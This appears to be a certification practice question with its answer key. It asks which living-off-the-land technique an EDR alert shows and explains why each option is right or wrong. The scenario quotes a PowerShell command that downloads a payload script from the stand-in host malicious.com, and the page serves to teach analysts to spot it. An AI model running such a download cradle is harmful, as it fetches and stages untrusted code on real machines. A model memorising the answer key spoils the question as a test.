CS0-003 Security Operations Practice Question
An analyst is investigating an EDR alert showing that 'powershell.exe' was launched by 'winword.exe' with the command: 'powershell -Command Invoke-WebRequest -Uri http://malicious.com/payload.ps1 -OutFile C:\Users\Public\payload.ps1'. Which LOLBin technique is being observed?
Answer choices
Why each option matters
Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.
Correct answer & explanation
✓
PowerShell download cradle
The attack chain involves a Microsoft Office document (winword.exe) launching PowerShell to download a payload. This is a classic LOLBin technique using PowerShell for code execution and download cradles.
Answer analysis
Option-by-option breakdown
For each option: why learners choose it and why it is or isn't the right answer here.
- ✓
PowerShell download cradle
Why this is correct
The EDR alert describes a PowerShell download cradle, a classic Living off the Land (LotL) technique where command-line utilities like Invoke-WebRequest or Net.WebClient are abused to fetch and execute malicious code. Security analysts frequently flag these patterns because they bypass traditional file-based detection mechanisms by leveraging trusted system binaries to download payloads directly into memory or disk.
- ✗
WMI persistence
Why it's wrong here
Windows Management Instrumentation (WMI) persistence relies on creating event filters, consumers, and bindings to execute payloads in response to specific system triggers. While PowerShell can be used to configure these WMI objects, the specific alert details a download cradle mechanism rather than the establishment of a persistent administrative trigger.
- ✗
Scheduled task creation
Why it's wrong here
Scheduled task creation involves registering a task with the Task Scheduler service, using tools like schtasks.exe or the Register-ScheduledTask cmdlet, to achieve execution at specific intervals or events. The alert in question focuses strictly on the retrieval of an external payload via a download cradle, not the configuration of a persistent execution schedule.
- ✗
DLL side-loading
Why it's wrong here
DLL side-loading is an execution technique where an adversary places a malicious DLL in the same directory as a legitimate, trusted executable that is vulnerable to DLL search order hijacking. The EDR alert describes a network-based download cradle utilizing PowerShell, which does not involve manipulating the Windows dynamic-link library search order or hijacking legitimate binary execution paths.
Go deeper
Related to this question
Learn chapter
Attack Surface Analysis and Reduction
Key term
EDR alert
An EDR alert is a notification generated by Endpoint Detection and Response software when it detects potentially malicious activity or an anomaly on a device like a laptop, server, or workstation.
Key term
EDR
Endpoint Detection and Response (EDR) is a cybersecurity technology that continuously monitors endpoint devices to detect, investigate, and respond to advanced threats.
About these practice questions
Courseiva writes every CS0-004 question from scratch — 701 in total, each with an explanation and a wrong-answer breakdown. None are copied from real exams or dumps. Learn why practice questions differ from exam dumps →
JA
Written by Johnson Ajibi, MSc IT Security
Senior Network & Security Engineer · founder of Courseiva
This CS0-004 practice question is part of Courseiva's free CompTIA certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the CS0-004 exam.